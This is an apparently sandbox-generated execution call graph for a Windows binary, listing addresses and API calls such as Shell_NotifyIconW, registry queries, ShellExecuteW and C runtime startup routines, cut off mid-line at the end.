                                                execution_graph 86115 4010e0 86118 401100 86115->86118 86117 4010f8 86119 401113 86118->86119 86120 401120 86119->86120 86121 401184 86119->86121 86122 40114c 86119->86122 86152 401182 86119->86152 86123 40112c DefWindowProcW 86120->86123 86177 401000 Shell_NotifyIconW __setmbcp_nolock 86120->86177 86156 401250 86121->86156 86124 401151 86122->86124 86125 40119d 86122->86125 86123->86117 86129 401219 86124->86129 86130 40115d 86124->86130 86127 4011a3 86125->86127 86128 42afb4 86125->86128 86127->86120 86137 4011b6 KillTimer 86127->86137 86138 4011db SetTimer RegisterWindowMessageW 86127->86138 86172 40f190 10 API calls 86128->86172 86129->86120 86134 401225 86129->86134 86132 401163 86130->86132 86133 42b01d 86130->86133 86131 401193 86131->86117 86139 42afe9 86132->86139 86140 40116c 86132->86140 86133->86123 86176 4370f4 52 API calls 86133->86176 86188 468b0e 74 API calls __setmbcp_nolock 86134->86188 86171 401000 Shell_NotifyIconW __setmbcp_nolock 86137->86171 86138->86131 86145 401204 CreatePopupMenu 86138->86145 86174 40f190 10 API calls 86139->86174 86140->86120 86147 401174 86140->86147 86141 42b04f 86178 40e0c0 86141->86178 86145->86117 86173 45fd57 65 API calls __setmbcp_nolock 86147->86173 86149 42afe4 86149->86131 86150 42b00e 86175 401a50 331 API calls 86150->86175 86151 4011c9 PostQuitMessage 86151->86117 86152->86123 86155 42afdc 86155->86123 86155->86149 86157 401262 __setmbcp_nolock 86156->86157 86158 4012e8 86156->86158 86189 401b80 86157->86189 86158->86131 86160 40128c 86161 4012d1 KillTimer SetTimer 86160->86161 86162 4012bb 86160->86162 86163 4272ec 86160->86163 86161->86158 86164 4012c5 86162->86164 86165 42733f 86162->86165 86166 4272f4 Shell_NotifyIconW 86163->86166 86167 42731a Shell_NotifyIconW 86163->86167 86164->86161 86168 427393 Shell_NotifyIconW 86164->86168 86169 427348 Shell_NotifyIconW 86165->86169 86170 42736e Shell_NotifyIconW 86165->86170 86166->86161 86167->86161 86168->86161 86169->86161 86170->86161 86171->86151 86172->86131 86173->86155 86174->86150 86175->86152 86176->86152 86177->86141 86180 40e0e7 __setmbcp_nolock 86178->86180 86179 40e142 86185 40e184 86179->86185 86287 4341e6 63 API calls __wcsicoll 86179->86287 86180->86179 86181 42729f DestroyIcon 86180->86181 86181->86179 86183 40e1a0 Shell_NotifyIconW 86186 401b80 54 API calls 86183->86186 86184 4272db Shell_NotifyIconW 86185->86183 86185->86184 86187 40e1ba 86186->86187 86187->86152 86188->86149 86190 401b9c 86189->86190 86209 401c7e 86189->86209 86211 4013c0 86190->86211 86193 42722b LoadStringW 86196 427246 86193->86196 86194 401bb9 86216 402160 86194->86216 86230 40e0a0 86196->86230 86197 401bcd 86199 427258 86197->86199 86200 401bda 86197->86200 86234 40d200 52 API calls 2 library calls 86199->86234 86200->86196 86201 401be4 86200->86201 86229 40d200 52 API calls 2 library calls 86201->86229 86204 427267 86205 42727b 86204->86205 86207 401bf3 _wcscpy __setmbcp_nolock _wcsncpy 86204->86207 86235 40d200 52 API calls 2 library calls 86205->86235 86208 401c62 Shell_NotifyIconW 86207->86208 86208->86209 86209->86160 86210 427289 86236 4115d7 86211->86236 86217 426daa 86216->86217 86218 40216b _wcslen 86216->86218 86274 40c600 86217->86274 86221 402180 86218->86221 86222 40219e 86218->86222 86220 426db5 86220->86197 86273 403bd0 52 API calls moneypunct 86221->86273 86224 4013a0 52 API calls 86222->86224 86226 4021a5 86224->86226 86225 402187 _memmove 86225->86197 86227 426db7 86226->86227 86228 4115d7 52 API calls 86226->86228 86228->86225 86229->86207 86231 40e0b2 86230->86231 86232 40e0a8 86230->86232 86231->86207 86286 403c30 52 API calls _memmove 86232->86286 86234->86204 86235->86210 86238 4115e1 _malloc 86236->86238 86239 4013e4 86238->86239 86242 4115fd std::exception::exception 86238->86242 86250 4135bb 86238->86250 86247 4013a0 86239->86247 86240 41163b 86265 4180af 46 API calls std::exception::operator= 86240->86265 86242->86240 86264 41130a 51 API calls __cinit 86242->86264 86243 411645 86266 418105 RaiseException 86243->86266 86246 411656 86248 4115d7 52 API calls 86247->86248 86249 4013a7 86248->86249 86249->86193 86249->86194 86251 413638 _malloc 86250->86251 86254 4135c9 _malloc 86250->86254 86272 417f77 46 API calls __getptd_noexit 86251->86272 86252 4135d4 86252->86254 86267 418901 46 API calls 2 library calls 86252->86267 86268 418752 46 API calls 9 library calls 86252->86268 86269 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86252->86269 86254->86252 86256 4135f7 RtlAllocateHeap 86254->86256 86259 413624 86254->86259 86262 413622 86254->86262 86256->86254 86257 413630 86256->86257 86257->86238 86270 417f77 46 API calls __getptd_noexit 86259->86270 86271 417f77 46 API calls __getptd_noexit 86262->86271 86264->86240 86265->86243 86266->86246 86267->86252 86268->86252 86270->86262 86271->86257 86272->86257 86273->86225 86275 40c619 86274->86275 86276 40c60a 86274->86276 86275->86220 86276->86275 86279 4026f0 86276->86279 86278 426d7a _memmove 86278->86220 86280 426873 86279->86280 86281 4026ff 86279->86281 86282 4013a0 52 API calls 86280->86282 86281->86278 86283 42687b 86282->86283 86284 4115d7 52 API calls 86283->86284 86285 42689e _memmove 86284->86285 86285->86278 86286->86231 86287->86185 86288 40bd20 86290 428194 86288->86290 86291 40bd2d 86288->86291 86289 40bd43 86290->86289 86293 4281bc 86290->86293 86295 4281b2 86290->86295 86297 40bd37 86291->86297 86311 4531b1 85 API calls 5 library calls 86291->86311 86310 45e987 86 API calls moneypunct 86293->86310 86309 40b510 VariantClear 86295->86309 86300 40bd50 86297->86300 86299 4281ba 86301 426cf1 86300->86301 86302 40bd63 86300->86302 86321 44cde9 52 API calls _memmove 86301->86321 86312 40bd80 86302->86312 86305 40bd73 86305->86289 86306 426cfc 86307 40e0a0 52 API calls 86306->86307 86308 426d02 86307->86308 86309->86299 86310->86291 86311->86297 86313 40bd8e 86312->86313 86320 40bdb7 _memmove 86312->86320 86314 40bded 86313->86314 86315 40bdad 86313->86315 86313->86320 86316 4115d7 52 API calls 86314->86316 86322 402f00 86315->86322 86318 40bdf6 86316->86318 86319 4115d7 52 API calls 86318->86319 86318->86320 86319->86320 86320->86305 86321->86306 86323 402f10 86322->86323 86324 402f0c 86322->86324 86325 4115d7 52 API calls 86323->86325 86326 4268c3 86323->86326 86324->86320 86327 402f51 moneypunct _memmove 86325->86327 86327->86320 86328 425ba2 86333 40e360 86328->86333 86330 425bb4 86349 41130a 51 API calls __cinit 86330->86349 86332 425bbe 86334 4115d7 52 API calls 86333->86334 86335 40e3ec GetModuleFileNameW 86334->86335 86350 413a0e 86335->86350 86337 40e421 _wcsncat 86353 413a9e 86337->86353 86340 4115d7 52 API calls 86341 40e45e _wcscpy 86340->86341 86356 40bc70 86341->86356 86345 40e4a9 86345->86330 86346 40e4a1 _wcscat _wcslen _wcsncpy 86346->86345 86347 401c90 52 API calls 86346->86347 86348 4115d7 52 API calls 86346->86348 86347->86346 86348->86346 86349->86332 86375 413801 86350->86375 86405 419efd 86353->86405 86357 4115d7 52 API calls 86356->86357 86358 40bc98 86357->86358 86359 4115d7 52 API calls 86358->86359 86360 40bca6 86359->86360 86361 40e4c0 86360->86361 86417 403350 86361->86417 86363 40e4cb RegOpenKeyExW 86364 427190 RegQueryValueExW 86363->86364 86365 40e4eb 86363->86365 86366 4271b0 86364->86366 86367 42721a RegCloseKey 86364->86367 86365->86346 86368 4115d7 52 API calls 86366->86368 86367->86346 86369 4271cb 86368->86369 86424 43652f 52 API calls 86369->86424 86371 4271d8 RegQueryValueExW 86372 42720e 86371->86372 86373 4271f7 86371->86373 86372->86367 86374 402160 52 API calls 86373->86374 86374->86372 86376 41389e 86375->86376 86383 41381a 86375->86383 86377 4139e8 86376->86377 86379 413a00 86376->86379 86402 417f77 46 API calls __getptd_noexit 86377->86402 86404 417f77 46 API calls __getptd_noexit 86379->86404 86380 4139ed 86403 417f25 10 API calls __wsplitpath_helper 86380->86403 86383->86376 86388 41388a 86383->86388 86397 419e30 46 API calls __wsplitpath_helper 86383->86397 86385 41396c 86385->86376 86386 413967 86385->86386 86389 41397a 86385->86389 86386->86337 86387 413929 86387->86376 86390 413945 86387->86390 86399 419e30 46 API calls __wsplitpath_helper 86387->86399 86388->86376 86396 413909 86388->86396 86398 419e30 46 API calls __wsplitpath_helper 86388->86398 86401 419e30 46 API calls __wsplitpath_helper 86389->86401 86390->86376 86390->86386 86393 41395b 86390->86393 86400 419e30 46 API calls __wsplitpath_helper 86393->86400 86396->86385 86396->86387 86397->86388 86398->86396 86399->86390 86400->86386 86401->86386 86402->86380 86403->86386 86404->86386 86406 419f13 86405->86406 86407 419f0e 86405->86407 86414 417f77 46 API calls __getptd_noexit 86406->86414 86407->86406 86413 419f2b 86407->86413 86409 419f18 86415 417f25 10 API calls __wsplitpath_helper 86409->86415 86412 40e454 86412->86340 86413->86412 86416 417f77 46 API calls __getptd_noexit 86413->86416 86414->86409 86415->86412 86416->86409 86418 403367 86417->86418 86419 403358 86417->86419 86420 4115d7 52 API calls 86418->86420 86419->86363 86421 403370 86420->86421 86422 4115d7 52 API calls 86421->86422 86423 40339e 86422->86423 86423->86363 86424->86371 86425 416454 86462 416c70 86425->86462 86427 416460 GetStartupInfoW 86428 416474 86427->86428 86463 419d5a HeapCreate 86428->86463 86430 4164cd 86431 4164d8 86430->86431 86547 41642b 46 API calls 3 library calls 86430->86547 86464 417c20 GetModuleHandleW 86431->86464 86434 4164de 86435 4164e9 __RTC_Initialize 86434->86435 86548 41642b 46 API calls 3 library calls 86434->86548 86483 41aaa1 GetStartupInfoW 86435->86483 86439 416503 GetCommandLineW 86496 41f584 GetEnvironmentStringsW 86439->86496 86443 416513 86502 41f4d6 GetModuleFileNameW 86443->86502 86445 41651d 86446 416528 86445->86446 86550 411924 46 API calls 3 library calls 86445->86550 86506 41f2a4 86446->86506 86449 41652e 86450 416539 86449->86450 86551 411924 46 API calls 3 library calls 86449->86551 86520 411703 86450->86520 86453 416541 86455 41654c __wwincmdln 86453->86455 86552 411924 46 API calls 3 library calls 86453->86552 86524 40d6b0 86455->86524 86458 41657c 86554 411906 46 API calls _doexit 86458->86554 86461 416581 _fseek 86462->86427 86463->86430 86465 417c34 86464->86465 86466 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86464->86466 86555 4178ff 49 API calls _free 86465->86555 86468 417c87 TlsAlloc 86466->86468 86471 417cd5 TlsSetValue 86468->86471 86472 417d96 86468->86472 86469 417c39 86469->86434 86471->86472 86473 417ce6 __init_pointers 86471->86473 86472->86434 86556 418151 InitializeCriticalSectionAndSpinCount 86473->86556 86475 417d91 86564 4178ff 49 API calls _free 86475->86564 86477 417d2a 86477->86475 86557 416b49 86477->86557 86480 417d76 86563 41793c 46 API calls 4 library calls 86480->86563 86482 417d7e GetCurrentThreadId 86482->86472 86484 416b49 __calloc_crt 46 API calls 86483->86484 86485 41aabf 86484->86485 86485->86485 86486 41ac34 86485->86486 86488 416b49 __calloc_crt 46 API calls 86485->86488 86490 4164f7 86485->86490 86492 41abb4 86485->86492 86487 41ac6a GetStdHandle 86486->86487 86489 41acce SetHandleCount 86486->86489 86491 41ac7c GetFileType 86486->86491 86495 41aca2 InitializeCriticalSectionAndSpinCount 86486->86495 86487->86486 86488->86485 86489->86490 86490->86439 86549 411924 46 API calls 3 library calls 86490->86549 86491->86486 86492->86486 86493 41abe0 GetFileType 86492->86493 86494 41abeb InitializeCriticalSectionAndSpinCount 86492->86494 86493->86492 86493->86494 86494->86490 86494->86492 86495->86486 86495->86490 86497 41f595 86496->86497 86498 41f599 86496->86498 86497->86443 86574 416b04 86498->86574 86500 41f5bb _memmove 86501 41f5c2 FreeEnvironmentStringsW 86500->86501 86501->86443 86503 41f50b _wparse_cmdline 86502->86503 86504 416b04 __malloc_crt 46 API calls 86503->86504 86505 41f54e _wparse_cmdline 86503->86505 86504->86505 86505->86445 86507 41f2bc _wcslen 86506->86507 86511 41f2b4 86506->86511 86508 416b49 __calloc_crt 46 API calls 86507->86508 86513 41f2e0 _wcslen 86508->86513 86509 41f336 86581 413748 86509->86581 86511->86449 86512 416b49 __calloc_crt 46 API calls 86512->86513 86513->86509 86513->86511 86513->86512 86514 41f35c 86513->86514 86517 41f373 86513->86517 86580 41ef12 46 API calls __wsplitpath_helper 86513->86580 86515 413748 _free 46 API calls 86514->86515 86515->86511 86587 417ed3 86517->86587 86519 41f37f 86519->86449 86521 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86520->86521 86523 411750 __IsNonwritableInCurrentImage 86521->86523 86606 41130a 51 API calls __cinit 86521->86606 86523->86453 86525 42e2f3 86524->86525 86526 40d6cc 86524->86526 86607 408f40 86526->86607 86528 40d707 86611 40ebb0 86528->86611 86531 40d737 86614 411951 86531->86614 86536 40d751 86626 40f4e0 SystemParametersInfoW SystemParametersInfoW 86536->86626 86538 40d75f 86627 40d590 GetCurrentDirectoryW 86538->86627 86540 40d767 SystemParametersInfoW 86541 40d794 86540->86541 86542 40d78d FreeLibrary 86540->86542 86543 408f40 VariantClear 86541->86543 86542->86541 86544 40d79d 86543->86544 86545 408f40 VariantClear 86544->86545 86546 40d7a6 86545->86546 86546->86458 86553 4118da 46 API calls _doexit 86546->86553 86547->86431 86548->86435 86553->86458 86554->86461 86555->86469 86556->86477 86559 416b52 86557->86559 86560 416b8f 86559->86560 86561 416b70 Sleep 86559->86561 86565 41f677 86559->86565 86560->86475 86560->86480 86562 416b85 86561->86562 86562->86559 86562->86560 86563->86482 86564->86472 86566 41f683 86565->86566 86567 41f69e _malloc 86565->86567 86566->86567 86568 41f68f 86566->86568 86569 41f6b1 HeapAlloc 86567->86569 86572 41f6d8 86567->86572 86573 417f77 46 API calls __getptd_noexit 86568->86573 86569->86567 86569->86572 86571 41f694 86571->86559 86572->86559 86573->86571 86577 416b0d 86574->86577 86575 4135bb _malloc 45 API calls 86575->86577 86576 416b43 86576->86500 86577->86575 86577->86576 86578 416b24 Sleep 86577->86578 86579 416b39 86578->86579 86579->86576 86579->86577 86580->86513 86582 413753 RtlFreeHeap 86581->86582 86586 41377c _free 86581->86586 86583 413768 86582->86583 86582->86586 86590 417f77 46 API calls __getptd_noexit 86583->86590 86585 41376e GetLastError 86585->86586 86586->86511 86591 417daa 86587->86591 86590->86585 86592 417dc9 __setmbcp_nolock __call_reportfault 86591->86592 86593 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86592->86593 86594 417eb5 __call_reportfault 86593->86594 86597 41a208 86594->86597 86596 417ed1 GetCurrentProcess TerminateProcess 86596->86519 86598 41a210 86597->86598 86599 41a212 IsDebuggerPresent 86597->86599 86598->86596 86605 41fe19 86599->86605 86602 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86603 421ff8 GetCurrentProcess TerminateProcess 86602->86603 86604 421ff0 __call_reportfault 86602->86604 86603->86596 86604->86603 86605->86602 86606->86523 86608 408f48 moneypunct 86607->86608 86609 4265c7 VariantClear 86608->86609 86610 408f55 moneypunct 86608->86610 86609->86610 86610->86528 86667 40ebd0 86611->86667 86671 4182cb 86614->86671 86616 41195e 86678 4181f2 LeaveCriticalSection 86616->86678 86618 40d748 86619 4119b0 86618->86619 86620 4119d6 86619->86620 86621 4119bc 86619->86621 86620->86536 86621->86620 86713 417f77 46 API calls __getptd_noexit 86621->86713 86623 4119c6 86714 417f25 10 API calls __wsplitpath_helper 86623->86714 86625 4119d1 86625->86536 86626->86538 86715 401f20 86627->86715 86629 40d5b6 IsDebuggerPresent 86630 40d5c4 86629->86630 86631 42e1bb MessageBoxA 86629->86631 86632 42e1d4 86630->86632 86633 40d5e3 86630->86633 86631->86632 86887 403a50 52 API calls 3 library calls 86632->86887 86785 40f520 86633->86785 86637 40d5fd GetFullPathNameW 86797 401460 86637->86797 86639 40d63b 86640 40d643 86639->86640 86641 42e231 SetCurrentDirectoryW 86639->86641 86642 40d64c 86640->86642 86888 432fee 6 API calls 86640->86888 86641->86640 86812 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86642->86812 86645 42e252 86645->86642 86647 42e25a GetModuleFileNameW 86645->86647 86649 42e274 86647->86649 86650 42e2cb GetForegroundWindow ShellExecuteW 86647->86650 86889 401b10 86649->86889 86651 40d688 86650->86651 86658 40d692 SetCurrentDirectoryW 86651->86658 86653 40d669 86820 4091e0 86653->86820 86654 40d656 86654->86653 86656 40e0c0 74 API calls 86654->86656 86656->86653 86658->86540 86661 42e28d 86896 40d200 52 API calls 2 library calls 86661->86896 86664 42e299 GetForegroundWindow ShellExecuteW 86665 42e2c6 86664->86665 86665->86651 86666 40ec00 LoadLibraryA GetProcAddress 86666->86531 86668 40d72e 86667->86668 86669 40ebd6 LoadLibraryA 86667->86669 86668->86531 86668->86666 86669->86668 86670 40ebe7 GetProcAddress 86669->86670 86670->86668 86672 4182e0 86671->86672 86673 4182f3 EnterCriticalSection 86671->86673 86679 418209 86672->86679 86673->86616 86675 4182e6 86675->86673 86706 411924 46 API calls 3 library calls 86675->86706 86678->86618 86680 418215 _fseek 86679->86680 86681 418225 86680->86681 86682 41823d 86680->86682 86707 418901 46 API calls 2 library calls 86681->86707 86684 416b04 __malloc_crt 45 API calls 86682->86684 86695 41824b _fseek 86682->86695 86686 418256 86684->86686 86685 41822a 86708 418752 46 API calls 9 library calls 86685->86708 86689 41825d 86686->86689 86690 41826c 86686->86690 86688 418231 86709 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86688->86709 86710 417f77 46 API calls __getptd_noexit 86689->86710 86693 4182cb __lock 45 API calls 86690->86693 86696 418273 86693->86696 86695->86675 86697 4182a6 86696->86697 86698 41827b InitializeCriticalSectionAndSpinCount 86696->86698 86699 413748 _free 45 API calls 86697->86699 86700 418297 86698->86700 86701 41828b 86698->86701 86699->86700 86712 4182c2 LeaveCriticalSection _doexit 86700->86712 86702 413748 _free 45 API calls 86701->86702 86703 418291 86702->86703 86711 417f77 46 API calls __getptd_noexit 86703->86711 86707->86685 86708->86688 86710->86695 86711->86700 86712->86695 86713->86623 86714->86625 86897 40e6e0 86715->86897 86719 401f41 GetModuleFileNameW 86915 410100 86719->86915 86721 401f5c 86927 410960 86721->86927 86724 401b10 52 API calls 86725 401f81 86724->86725 86930 401980 86725->86930 86727 401f8e 86728 408f40 VariantClear 86727->86728 86729 401f9d 86728->86729 86730 401b10 52 API calls 86729->86730 86731 401fb4 86730->86731 86732 401980 53 API calls 86731->86732 86733 401fc3 86732->86733 86734 401b10 52 API calls 86733->86734 86735 401fd2 86734->86735 86938 40c2c0 86735->86938 86737 401fe1 86738 40bc70 52 API calls 86737->86738 86739 401ff3 86738->86739 86956 401a10 86739->86956 86741 401ffe 86963 4114ab 86741->86963 86744 428b05 86746 401a10 52 API calls 86744->86746 86745 402017 86747 4114ab __wcsicoll 58 API calls 86745->86747 86748 428b18 86746->86748 86749 402022 86747->86749 86751 401a10 52 API calls 86748->86751 86749->86748 86750 40202d 86749->86750 86752 4114ab __wcsicoll 58 API calls 86750->86752 86753 428b33 86751->86753 86754 402038 86752->86754 86756 428b3b GetModuleFileNameW 86753->86756 86755 402043 86754->86755 86754->86756 86757 4114ab __wcsicoll 58 API calls 86755->86757 86758 401a10 52 API calls 86756->86758 86763 40204e 86757->86763 86759 428b6c 86758->86759 86760 40e0a0 52 API calls 86759->86760 86764 428b7a 86760->86764 86761 4020a3 86765 428bc6 86761->86765 86971 40e830 53 API calls 86761->86971 86762 428b90 _wcscpy 86771 401a10 52 API calls 86762->86771 86763->86762 86766 401a10 52 API calls 86763->86766 86776 402092 86763->86776 86767 401a10 52 API calls 86764->86767 86769 402073 _wcscpy 86766->86769 86770 428b88 86767->86770 86774 401a10 52 API calls 86769->86774 86770->86762 86780 4020d0 86771->86780 86772 4020bb 86972 40cf00 53 API calls 86772->86972 86774->86776 86775 4020c6 86777 408f40 VariantClear 86775->86777 86776->86761 86776->86762 86777->86780 86778 402110 86782 408f40 VariantClear 86778->86782 86780->86778 86783 401a10 52 API calls 86780->86783 86973 40cf00 53 API calls 86780->86973 86974 40e6a0 53 API calls 86780->86974 86784 402120 moneypunct 86782->86784 86783->86780 86784->86629 86786 4295c9 __setmbcp_nolock 86785->86786 86787 40f53c 86785->86787 86789 4295d9 GetOpenFileNameW 86786->86789 87653 410120 86787->87653 86789->86787 86793 40d5f5 86789->86793 86790 40f545 87657 4102b0 SHGetMalloc 86790->87657 86792 40f54c 87662 410190 GetFullPathNameW 86792->87662 86793->86637 86793->86639 86795 40f559 87673 40f570 86795->87673 87729 402400 86797->87729 86799 40146f 86802 428c29 _wcscat 86799->86802 87738 401500 86799->87738 86801 40147c 86801->86802 87746 40d440 86801->87746 86804 401489 86804->86802 86805 401491 GetFullPathNameW 86804->86805 86806 402160 52 API calls 86805->86806 86807 4014bb 86806->86807 86808 402160 52 API calls 86807->86808 86809 4014c8 86808->86809 86809->86802 86810 402160 52 API calls 86809->86810 86811 4014ee 86810->86811 86811->86639 86813 428361 86812->86813 86814 4103fc LoadImageW RegisterClassExW 86812->86814 87766 44395e EnumResourceNamesW LoadImageW 86813->87766 87765 410490 7 API calls 86814->87765 86817 40d651 86819 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86817->86819 86818 428368 86819->86654 86821 409202 86820->86821 86822 42d7ad 86820->86822 86865 409216 moneypunct 86821->86865 88038 410940 331 API calls 86821->88038 88041 45e737 90 API calls 3 library calls 86822->88041 86825 409386 86826 40939c 86825->86826 88039 40f190 10 API calls 86825->88039 86826->86651 86886 401000 Shell_NotifyIconW __setmbcp_nolock 86826->86886 86828 4095b2 86828->86826 86829 4095bf 86828->86829 88040 401a50 331 API calls 86829->88040 86830 409253 PeekMessageW 86830->86865 86832 42d8cd Sleep 86832->86865 86833 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86833->86826 86836 4095f9 86833->86836 86835 42e13b 88059 40d410 VariantClear 86835->88059 86838 42e158 TranslateMessage DispatchMessageW GetMessageW 86836->86838 86838->86838 86841 42e188 86838->86841 86840 409567 PeekMessageW 86840->86865 86841->86826 86844 44c29d 52 API calls 86870 4094e0 86844->86870 86845 46f3c1 107 API calls 86845->86865 86846 40e0a0 52 API calls 86846->86865 86847 46fdbf 108 API calls 86847->86870 86848 409551 TranslateMessage DispatchMessageW 86848->86840 86850 42dcd2 WaitForSingleObject 86851 42dcf0 GetExitCodeProcess CloseHandle 86850->86851 86850->86865 88048 40d410 VariantClear 86851->88048 86853 42dd3d Sleep 86853->86870 86854 47d33e 309 API calls 86854->86865 86857 4094cf Sleep 86857->86870 86859 42d94d timeGetTime 88044 465124 53 API calls 86859->88044 86861 40d410 VariantClear 86861->86865 86862 40c620 timeGetTime 86862->86870 86865->86825 86865->86830 86865->86832 86865->86835 86865->86840 86865->86845 86865->86846 86865->86848 86865->86850 86865->86853 86865->86854 86865->86857 86865->86859 86865->86861 86865->86870 86877 45e737 90 API calls 86865->86877 86880 42e0cc VariantClear 86865->86880 86881 408f40 VariantClear 86865->86881 87767 4091b0 86865->87767 87825 40afa0 86865->87825 87851 408fc0 86865->87851 87886 408cc0 86865->87886 87900 40d150 86865->87900 87905 40d170 86865->87905 87911 4096a0 86865->87911 88042 465124 53 API calls 86865->88042 88043 40c620 timeGetTime 86865->88043 88058 40e270 VariantClear moneypunct 86865->88058 86866 42dd89 CloseHandle 86866->86870 86868 465124 53 API calls 86868->86870 86869 42de19 GetExitCodeProcess CloseHandle 86869->86870 86870->86844 86870->86847 86870->86862 86870->86865 86870->86866 86870->86868 86870->86869 86872 401b10 52 API calls 86870->86872 86874 42de88 Sleep 86870->86874 86883 408f40 VariantClear 86870->86883 86884 401980 53 API calls 86870->86884 88045 45178a 54 API calls 86870->88045 88046 47d33e 331 API calls 86870->88046 88047 453bc6 54 API calls 86870->88047 88049 40d410 VariantClear 86870->88049 88050 443d19 67 API calls _wcslen 86870->88050 88051 4574b4 VariantClear 86870->88051 88052 403cd0 86870->88052 88056 4731e1 VariantClear 86870->88056 88057 4331a2 6 API calls 86870->88057 86872->86870 86874->86865 86877->86865 86880->86865 86881->86865 86883->86870 86884->86870 86886->86651 86887->86639 86888->86645 86890 401b16 _wcslen 86889->86890 86891 4115d7 52 API calls 86890->86891 86894 401b63 86890->86894 86892 401b4b _memmove 86891->86892 86893 4115d7 52 API calls 86892->86893 86893->86894 86895 40d200 52 API calls 2 library calls 86894->86895 86895->86661 86896->86664 86898 40bc70 52 API calls 86897->86898 86899 401f31 86898->86899 86900 402560 86899->86900 86901 40256d __write_nolock 86900->86901 86902 402160 52 API calls 86901->86902 86904 402593 86902->86904 86907 4025bd 86904->86907 86975 401c90 86904->86975 86905 4026f0 52 API calls 86905->86907 86906 4026a7 86908 401b10 52 API calls 86906->86908 86914 4026db 86906->86914 86907->86905 86907->86906 86909 401b10 52 API calls 86907->86909 86911 401c90 52 API calls 86907->86911 86978 40d7c0 52 API calls 2 library calls 86907->86978 86910 4026d1 86908->86910 86909->86907 86979 40d7c0 52 API calls 2 library calls 86910->86979 86911->86907 86914->86719 86980 40f760 86915->86980 86918 410118 86918->86721 86920 42805d 86923 42806a 86920->86923 87036 431e58 86920->87036 86922 413748 _free 46 API calls 86924 428078 86922->86924 86923->86922 86925 431e58 82 API calls 86924->86925 86926 428084 86925->86926 86926->86721 86928 4115d7 52 API calls 86927->86928 86929 401f74 86928->86929 86929->86724 86931 4019a3 86930->86931 86933 401985 86930->86933 86932 4019b8 86931->86932 86931->86933 87642 403e10 53 API calls 86932->87642 86935 40199f 86933->86935 87641 403e10 53 API calls 86933->87641 86935->86727 86937 4019c4 86937->86727 86939 40c2c7 86938->86939 86940 40c30e 86938->86940 86941 40c2d3 86939->86941 86942 426c79 86939->86942 86943 40c315 86940->86943 86944 426c2b 86940->86944 87643 403ea0 52 API calls __cinit 86941->87643 87648 4534e3 52 API calls 86942->87648 86948 40c321 86943->86948 86949 426c5a 86943->86949 86946 426c4b 86944->86946 86947 426c2e 86944->86947 87646 4534e3 52 API calls 86946->87646 86954 40c2de 86947->86954 87645 4534e3 52 API calls 86947->87645 87644 403ea0 52 API calls __cinit 86948->87644 87647 4534e3 52 API calls 86949->87647 86954->86737 86957 401a30 86956->86957 86958 401a17 86956->86958 86959 402160 52 API calls 86957->86959 86960 401a2d 86958->86960 87649 403c30 52 API calls _memmove 86958->87649 86962 401a3d 86959->86962 86960->86741 86962->86741 86964 411523 86963->86964 86965 4114ba 86963->86965 87652 4113a8 58 API calls 3 library calls 86964->87652 86968 40200c 86965->86968 87650 417f77 46 API calls __getptd_noexit 86965->87650 86968->86744 86968->86745 86969 4114c6 87651 417f25 10 API calls __wsplitpath_helper 86969->87651 86971->86772 86972->86775 86973->86780 86974->86780 86976 4026f0 52 API calls 86975->86976 86977 401c97 86976->86977 86977->86904 86978->86907 86979->86914 87040 40f6f0 86980->87040 86982 40f77b _strcat moneypunct 87048 40f850 86982->87048 86987 427c2a 87077 414d04 86987->87077 86989 40f7fc 86989->86987 86990 40f804 86989->86990 87064 414a46 86990->87064 86994 40f80e 86994->86918 86999 4528bd 86994->86999 86996 427c59 87083 414fe2 86996->87083 86998 427c79 87000 4150d1 _fseek 81 API calls 86999->87000 87001 452930 87000->87001 87583 452719 87001->87583 87004 452948 87004->86920 87005 414d04 __fread_nolock 61 API calls 87006 452966 87005->87006 87007 414d04 __fread_nolock 61 API calls 87006->87007 87008 452976 87007->87008 87009 414d04 __fread_nolock 61 API calls 87008->87009 87010 45298f 87009->87010 87011 414d04 __fread_nolock 61 API calls 87010->87011 87012 4529aa 87011->87012 87013 4150d1 _fseek 81 API calls 87012->87013 87014 4529c4 87013->87014 87015 4135bb _malloc 46 API calls 87014->87015 87016 4529cf 87015->87016 87017 4135bb _malloc 46 API calls 87016->87017 87018 4529db 87017->87018 87019 414d04 __fread_nolock 61 API calls 87018->87019 87020 4529ec 87019->87020 87021 44afef GetSystemTimeAsFileTime 87020->87021 87022 452a00 87021->87022 87023 452a36 87022->87023 87024 452a13 87022->87024 87026 452aa5 87023->87026 87027 452a3c 87023->87027 87025 413748 _free 46 API calls 87024->87025 87028 452a1c 87025->87028 87030 413748 _free 46 API calls 87026->87030 87589 44b1a9 87027->87589 87031 413748 _free 46 API calls 87028->87031 87033 452aa3 87030->87033 87034 452a25 87031->87034 87032 452a9d 87035 413748 _free 46 API calls 87032->87035 87033->86920 87034->86920 87035->87033 87037 431e64 87036->87037 87038 431e6a 87036->87038 87039 414a46 __fcloseall 82 API calls 87037->87039 87038->86923 87039->87038 87041 425de2 87040->87041 87042 40f6fc _wcslen 87040->87042 87041->86982 87043 40f710 WideCharToMultiByte 87042->87043 87044 40f756 87043->87044 87045 40f728 87043->87045 87044->86982 87046 4115d7 52 API calls 87045->87046 87047 40f735 WideCharToMultiByte 87046->87047 87047->86982 87050 40f85d __setmbcp_nolock _strlen 87048->87050 87051 40f7ab 87050->87051 87096 414db8 87050->87096 87052 4149c2 87051->87052 87111 414904 87052->87111 87054 40f7e9 87054->86987 87055 40f5c0 87054->87055 87060 40f5cd _strcat __write_nolock _memmove 87055->87060 87056 414d04 __fread_nolock 61 API calls 87056->87060 87058 425d11 87059 4150d1 _fseek 81 API calls 87058->87059 87061 425d33 87059->87061 87060->87056 87060->87058 87063 40f691 __tzset_nolock 87060->87063 87199 4150d1 87060->87199 87062 414d04 __fread_nolock 61 API calls 87061->87062 87062->87063 87063->86989 87065 414a52 _fseek 87064->87065 87066 414a64 87065->87066 87067 414a79 87065->87067 87339 417f77 46 API calls __getptd_noexit 87066->87339 87069 415471 __lock_file 47 API calls 87067->87069 87074 414a74 _fseek 87067->87074 87072 414a92 